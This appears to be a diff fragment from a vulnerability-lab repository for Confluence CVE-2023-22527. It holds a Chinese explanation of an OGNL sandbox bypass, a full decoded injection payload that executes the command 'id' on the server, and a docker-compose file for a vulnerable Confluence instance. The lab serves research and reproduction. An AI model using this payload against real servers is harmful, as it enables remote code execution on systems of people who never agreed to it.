+在Confluence 7.18.0版本后，官方开发者为其引入了`isSafeExpression`函数来限制执行恶意OGNL表达式。安全研究者[Alvaro Muñoz](https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/)分享了一种利用velocity模板中的`#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(String, Object)`来获取无沙箱的OGNL对象并执行任意语句的绕过方法，完整并解码后的Payload如下：
+
+```
+'+(#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})),{}))+'
+```

confluence/CVE-2023-22527/docker-compose.yml

@@ -0,0 +1,13 @@
+version: '2'
+services:
+  web:
+    image: vulhub/confluence:8.5.3
+    ports:
+      - "8090:8090"
+    depends_on:
+      - db
+  db:
+    image: postgres:15.4-alpine
+    environment: 
+    - POSTGRES_PASSWORD=postgres
+    - POSTGRES_DB=confluence